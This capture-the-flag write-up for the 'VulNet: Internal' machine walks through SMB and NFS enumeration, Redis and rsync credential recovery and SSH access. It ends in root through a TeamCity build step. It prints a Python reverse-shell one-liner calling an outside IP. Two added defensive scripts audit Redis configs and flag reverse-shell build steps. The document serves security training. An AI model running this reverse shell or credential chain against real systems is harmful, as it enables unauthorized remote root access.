# VulNet: Internal

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeRBDFRnfnN53Pw_Cm0%2F-MeSFKPRBjzhOVhAYmFI%2Fimage.png?alt=media\&token=f5f8e5f7-b15a-4262-a71d-d9c1c037fadb)

## Scanning

Let's run an nmap scan to find the open ports and the services running on them.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSGH4DfuiaT3MOidg_%2F-MeSGQV_tgzzoudEjfHh%2Fimage.png?alt=media\&token=2e951868-277b-4dab-b56f-22684dd7e454)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSGH4DfuiaT3MOidg_%2F-MeSGUz0J4z7trxrWfkG%2Fimage.png?alt=media\&token=9e2c7872-3de6-440b-9c05-542102c64501)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSGH4DfuiaT3MOidg_%2F-MeSGY9TF7vQdcnM-GCF%2Fimage.png?alt=media\&token=4490329e-4552-4cc9-a649-a35bc2616018)

## Enumeration

Let's check port 9090, which is running SMB.

Let's first look at what shares are on the system.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSGZrX_4wh5ygiXY-1%2F-MeSHPVcid27CU43oV4Y%2Fimage.png?alt=media\&token=dac947b7-c616-47ff-9917-8c8e2f2fee0a)

The Shares disk is interesting; let's try to access it as an anonymous user.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSGZrX_4wh5ygiXY-1%2F-MeSHdPTJR5o39kkkTGJ%2Fimage.png?alt=media\&token=8f522114-16e8-4da1-b383-1a4131e6c1cf)

We were able to access it. Let's cd into these directories and transfer all the files to our machine.

Let's read the services.txt file.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSIBi5npvoLwjGKnXK%2Fimage.png?alt=media\&token=a3282ab4-3f12-4021-9725-21ea3cd03c68)

Looks like we have the first flag.

Let's read the other files.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSILexMJopwTgI0Ux7%2Fimage.png?alt=media\&token=18b04a85-d086-493f-9225-d43b0b01f401)

There is nothing interesting there, so let's look at the other services running on the machine, starting with the RPC service on port 111.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSJD5mWOFa66ct27wq%2Fimage.png?alt=media\&token=f907b0f6-8ef6-4620-9696-fae58d464d8b)

Looks like there is an exported directory; let's mount it on our machine. First create a directory called mount, then run the mount command against it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSJYe0RMomRZ3JYa8H%2Fimage.png?alt=media\&token=17128ae9-e232-474f-9853-c2648b3eba2e)

Let's look for interesting files in the mounted directory. There is an interesting file in the redis directory.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSJyML2-C9QYMMHtDK%2Fimage.png?alt=media\&token=7eb8087f-2948-4757-8bb5-d8e5ded961e9)

There is a lot of output when we cat it, and it is a configuration file, so let's grep for "pass" strings to find anything password-related.
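The weakness here is not Redis itself but a configuration file, password included, sitting on an export that anyone on the network can mount. As an added example (not part of the write-up, and using a constructed sample file rather than the one on the machine), the following Python script parses a redis.conf-style file and reports the settings a defender would check before such a file is shared or backed up: clear-text secrets (`requirepass`, `masterauth`, inline ACL passwords), missing authentication, `bind` on all interfaces and `protected-mode no`. The finding codes and the `redact_secrets` helper are my own naming.

```python
"""Audit a redis.conf-style file for settings that matter when the file
leaks, for example via a world-readable NFS export or SMB share.
Added example; the sample configuration below is constructed."""
from __future__ import annotations

# Constructed sample, not the file found on the write-up's machine.
SAMPLE_CONF = """
# Redis configuration (constructed sample)
bind 0.0.0.0
protected-mode no
port 6379
requirepass s3cr3t-example
rename-command FLUSHALL ""
"""

# Directives whose argument is a secret in clear text.
SECRET_DIRECTIVES = ("requirepass", "masterauth")
# bind tokens that expose the service on every interface.
ALL_INTERFACES = {"0.0.0.0", "*", "::", "-::*", "-0.0.0.0"}


def parse_redis_conf(text: str) -> dict[str, list[str]]:
    """Return directive -> list of argument strings (a directive may repeat)."""
    directives: dict[str, list[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, _, args = line.partition(" ")
        directives.setdefault(name.lower(), []).append(args.strip())
    return directives


def audit_redis_conf(text: str) -> list[str]:
    """Return finding codes for the configuration text, in a fixed order."""
    conf = parse_redis_conf(text)
    findings: list[str] = []

    # A secret in the file means anyone who can read the file has it.
    for directive in SECRET_DIRECTIVES:
        if directive in conf:
            findings.append(f"plaintext-secret:{directive}")
    # ACL rules of the form "user alice on >password ..." embed a password too.
    if any(">" in rule for rule in conf.get("user", [])):
        findings.append("plaintext-secret:user")

    # No requirepass and no ACL users: the instance accepts anyone.
    if "requirepass" not in conf and not conf.get("user"):
        findings.append("no-authentication")

    # Missing bind or a wildcard bind listens on every interface.
    binds = conf.get("bind", [])
    if not binds or any(tok in ALL_INTERFACES for b in binds for tok in b.split()):
        findings.append("bind-all-interfaces")

    if any(v.lower() == "no" for v in conf.get("protected-mode", [])):
        findings.append("protected-mode-off")

    return findings


def redact_secrets(text: str) -> str:
    """Copy of the config with secret arguments masked, safe to paste in a ticket."""
    out = []
    for raw in text.splitlines():
        name = raw.strip().split(" ", 1)[0].lower()
        if name in SECRET_DIRECTIVES:
            out.append(f"{name} <redacted>")
        else:
            out.append(raw)
    return "\n".join(out)


if __name__ == "__main__":
    for code in audit_redis_conf(SAMPLE_CONF):
        print("finding:", code)
    print(redact_secrets(SAMPLE_CONF))
```

Run it against a real redis.conf by reading the file into `audit_redis_conf`. The `plaintext-secret` finding is the one this box illustrates: the fix is to rotate the password and restrict the file (and the share it lives on) to the Redis service account, not to stop using `requirepass`.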

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSKBuTEVkHxmt-F9d-%2Fimage.png?alt=media\&token=8917ce9c-6e60-4820-8c22-6d155784de4e)

Now that we have the password, let's authenticate to redis and look for the second flag.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSMJWCDnx7M6ZTZo0r%2Fimage.png?alt=media\&token=bbb391f8-7ac2-47b4-a766-d4f524cdf19b)

We have the second flag. Now let's look at the auth key. We cannot GET it, so let's check its key type.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSMiD_bjojUG-XewzW%2Fimage.png?alt=media\&token=46ca771e-219b-4928-b645-6ce62a80bdd0)

Now that we know it's a list type, let's read it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSN0PqlZ8i2o3oazwZ%2Fimage.png?alt=media\&token=703843d4-0de3-4355-ba80-f2618531434b)

We have a base64 string; let's decode it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSN9GY9XufCB76-y5N%2Fimage.png?alt=media\&token=2c8ba3e9-bea8-4753-abb3-e4a5cf284a8a)

Looks like we have credentials for the rsync service running on the system. Let's look at it in more detail and see what interesting files we can find.

## Exploitation

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSNwZOgAz_Dob8vlXY%2Fimage.png?alt=media\&token=c28b40d3-e7d2-4b6f-a741-e6f907ab3b66)

Now we can either copy the files to our machine, or upload our SSH key and then log in to the machine over SSH.

First we have to create our SSH key pair and then upload the public key to the machine.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSP3tcTuCPMX6D0HO9%2Fimage.png?alt=media\&token=1b4a6f57-7d72-49ba-83ef-2013afedca90)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSP_JcR6VUxZw9-9ii%2Fimage.png?alt=media\&token=0b71cb8f-b7e4-4566-9cfe-e90022dd3f89)

Now we can log in.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSI9yJC0eJKOLTHSo9%2F-MeSPbyAEWW17QDisnJY%2Fimage.png?alt=media\&token=a68819ad-6c30-4041-8ee9-4f984ec26cdf)

Let's read the user flag.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSPe9Ur3BGWAULmN7V%2F-MeSPlYdle4zMjbCDB2m%2Fimage.png?alt=media\&token=51fca0f4-7f59-4d95-b55f-6f11725b7012)

## Privilege Escalation

Looking around, there is an interesting directory.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSYmbNaPJktgDcRqKh%2Fimage.png?alt=media\&token=4c07583c-76ef-4ccf-b06a-439046508722)

Let's look at this directory and read the readme file.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSZ22V7zgTbtUa92oZ%2Fimage.png?alt=media\&token=a83aee77-05fa-4b48-bc0b-809769cfc0ef)

Let's look at the ports listening on the machine.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSZIdqoqpu0Ec5tzHb%2Fimage.png?alt=media\&token=c099c2ba-2b9b-4aff-b7f1-17a08a09f93d)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSZLxAIvgrq0aY_B_H%2Fimage.png?alt=media\&token=725dffa5-7359-4fa1-b027-f6343322e467)

Something is listening on port 8111. Let's set up port forwarding so that we can see what is running on it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSZkwjAc5F52TDAHRI%2Fimage.png?alt=media\&token=52497331-e8f0-44b0-8ae2-2713531d7b58)

Now let's go to localhost:8111 in the browser.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSZv3bOcY7mQ5Mji72%2Fimage.png?alt=media\&token=df2aa5bd-0ccd-44f7-8346-f520912aad16)

We have a TeamCity login page. Clicking on the Super User option, we need an authentication token to log in; let's look for it on the machine.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeS_EFUEaki5NuXlcUs%2Fimage.png?alt=media\&token=8cf60793-fdee-4505-ada7-99c3933e2562)

```shell
grep -r "authentication token" 2>/dev/null
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeS_ql_cRqIxr15Ubj4%2Fimage.png?alt=media\&token=fa0ba99f-37d6-43b5-92ef-a30da3e2658a)

We have tokens; let's use one of them to log in. (None of them work except the last one.)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSa4wFBcipuvW-eabN%2Fimage.png?alt=media\&token=38a27fe3-3a09-4b7d-8afc-fae619aeb3de)

We are logged in.

Let's try to create a new project.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSaYu3qzCycJU9E_rY%2Fimage.png?alt=media\&token=ccd522ed-9b96-4294-b96e-a26beb3cdd57)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSab_vb2gWaSTwclLi%2Fimage.png?alt=media\&token=3d0b2ac1-6cce-4ddb-a68d-9b712aa0aa64)

Let's create a new Build Configuration.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSbXgxOcdVJoLbbx8F%2Fimage.png?alt=media\&token=6941fe5a-6c71-4867-933e-1e76ba8be870)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSbe5Rtoak87ssUCh-%2Fimage.png?alt=media\&token=7bfdeef1-fa19-4e25-a504-8dec74728a92)

Now let's go to the homepage and click on the project name.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSblkBmwgi9llHF_2f%2Fimage.png?alt=media\&token=0df9cf09-18da-42be-b384-a92c649cf33f)

Let's go to Edit Configuration Settings, then Build Steps, and select Python.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeSc5BircVHmQzCF2Sq%2Fimage.png?alt=media\&token=9ece16f8-79ee-4bff-b303-390ab8f7179b)

Let's add a reverse shell in the Custom script option.

```python
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.13.8.64",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeScSHoaQz_yIxXWuLX%2Fimage.png?alt=media\&token=e7c4293c-9c06-4211-a566-d334d7f38c03)

Let's now start a netcat listener on our machine.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeScZngYmkD0mt8AVY2%2Fimage.png?alt=media\&token=357efd37-7775-4fbc-a0b1-9a8ba85b896a)

Let's save the build step and run it by clicking Run.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeScnBJZJAtzrD1ZnXy%2Fimage.png?alt=media\&token=6e7722ea-5026-4829-b915-d696802e054d)

We have a shell as root; let's read the root flag.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeSYXbNxteAL4yjyRRd%2F-MeScy7w_zxJxixhkgFB%2Fimage.png?alt=media\&token=0c69ffaa-e702-462c-8d7e-0ff056e0e203)
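The last step is the one a TeamCity administrator would most want to catch: a build step whose "script" is an interactive shell dialled out to an external host, executed by a build agent that happens to run as root. As an added example (not part of the write-up), the following Python code is a heuristic triage pass over build-step scripts: it scores each script against a few reverse-shell indicators (outbound socket plus connect, stdin/stdout/stderr duplicated onto the socket, an interactive shell, an IP literal) and reports only the steps that hit more than one. The sample build steps are constructed; the suspicious one copies the shape of the one-liner above with a documentation IP address.

```python
"""Heuristic triage of CI build-step scripts for reverse-shell indicators.
Added example; the build steps below are constructed samples."""
from __future__ import annotations

import re

# Constructed sample build steps, keyed by step name.
BUILD_STEPS = {
    "run-tests": "import unittest\nunittest.main(module='tests')\n",
    "deploy": "import subprocess\n"
              "subprocess.run(['./deploy.sh', '--env', 'staging'], check=True)\n",
    # Same shape as the write-up's one-liner, with a documentation IP (RFC 5737).
    "suspicious": 'import socket,subprocess,os;'
                  's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
                  's.connect(("203.0.113.10",1234));'
                  'os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);'
                  'p=subprocess.call(["/bin/sh","-i"]);',
}

# Each indicator on its own is legitimate in some build; together they are not.
INDICATORS = {
    # a socket is created and then connected somewhere
    "outbound-socket": re.compile(r"socket\.socket\(.*?\)\s*;?.*?\.connect\(", re.S),
    # fd 0/1/2 redirected onto a socket or pipe
    "fd-redirect": re.compile(r"os\.dup2\(\s*\w+\.fileno\(\)\s*,\s*[012]\s*\)"),
    # an interactive shell is spawned
    "interactive-shell": re.compile(r"(/bin/(ba)?sh|cmd\.exe)[\"']?\s*,\s*[\"']-i[\"']"),
    # a hard-coded IPv4 literal (build scripts normally use hostnames or variables)
    "ip-literal": re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b"),
}


def score_step(script: str) -> list[str]:
    """Return the names of the indicators that match this script."""
    return [name for name, rx in INDICATORS.items() if rx.search(script)]


def triage_build_steps(steps: dict[str, str], threshold: int = 2) -> dict[str, list[str]]:
    """Return only the steps that hit at least `threshold` indicators."""
    scored = {name: score_step(script) for name, script in steps.items()}
    return {name: hits for name, hits in scored.items() if len(hits) >= threshold}


if __name__ == "__main__":
    for name, hits in triage_build_steps(BUILD_STEPS).items():
        print(f"{name}: {', '.join(hits)}")
```

Feed it the scripts exported from your build configurations (or the VCS-stored settings, if you version them). Two things on this box made the finding a root compromise rather than a nuisance: the agent ran as root, and the Super User token could be grepped out of readable files on the host. Running agents as an unprivileged user, and treating the Super User token like any other secret, limits the blast radius even when a malicious build step slips through.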
